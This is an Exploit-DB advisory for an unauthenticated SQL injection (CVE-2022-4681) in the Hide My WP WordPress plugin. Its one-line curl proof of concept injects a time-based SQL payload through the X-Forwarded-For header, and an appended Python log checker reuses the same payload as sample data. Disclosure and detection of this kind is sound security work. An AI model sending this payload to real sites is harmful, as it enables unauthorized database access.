
[webapps] Hide My WP < 6.2.9 - Unauthenticated SQLi

source link: https://www.exploit-db.com/exploits/51871

EDB-ID: 51871
EDB Verified:
Platform: PHP
Date: 2024-03-10
Vulnerable App:

# Exploit Title: WordPress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
# Publication Date: 2023-01-11
# Original Researcher: Xenofon Vassilakopoulos
# Exploit Author: Xenofon Vassilakopoulos
# Submitter: Xenofon Vassilakopoulos
# Vendor Homepage: https://wpwave.com/
# Version: Hide My WP v6.2.8 and prior
# Tested on: Hide My WP v6.2.7
# Impact: Database Access
# CVE: CVE-2022-4681
# CWE: CWE-89
# CVSS Score: 8.6 (high)

## Description

The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.


## Proof of Concept

curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
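
A defender-side check for the header used in the proof of concept, added here as an example; it is not code from the plugin, the vendor's fix, or the exploit author. It flags access-log lines whose X-Forwarded-For value is not a list of IP literals, assuming the header is logged as the last quoted field; the function names and log lines are constructed for illustration.

```python
import ipaddress
import re

# Assumed log layout: the X-Forwarded-For header is the last quoted field
# ("-" when absent). These lines are constructed for the example.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-"',
    '203.0.113.7 - - [10/Mar/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 512 '
    '"198.51.100.4, 2001:db8::1"',
    '203.0.113.9 - - [10/Mar/2024:10:00:03 +0000] "GET / HTTP/1.1" 200 512 '
    '"127.0.0.1\'+(select*from(select(sleep(20)))a)+\'"',
]

LAST_QUOTED = re.compile(r'"([^"]*)"\s*$')


def parse_xff(value):
    """Return the addresses in an X-Forwarded-For value, or None if any
    comma-separated element is not a plain IPv4/IPv6 literal."""
    addrs = []
    for part in value.split(","):
        try:
            addrs.append(ipaddress.ip_address(part.strip()))
        except ValueError:
            return None
    return addrs


def flag_lines(lines):
    """Return (line_number, header_value) for every log line whose
    X-Forwarded-For field is present but is not a list of IP literals."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = LAST_QUOTED.search(line)
        if not match or match.group(1) == "-":
            continue
        if parse_xff(match.group(1)) is None:
            hits.append((number, match.group(1)))
    return hits


if __name__ == "__main__":
    for number, value in flag_lines(SAMPLE_LOG):
        print(f"line {number}: non-IP X-Forwarded-For value: {value!r}")
```

The same `parse_xff` validation can be applied to the header before it is used anywhere in the application, but it complements rather than replaces a parameterized query and an upgrade to 6.2.9 or later.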
            
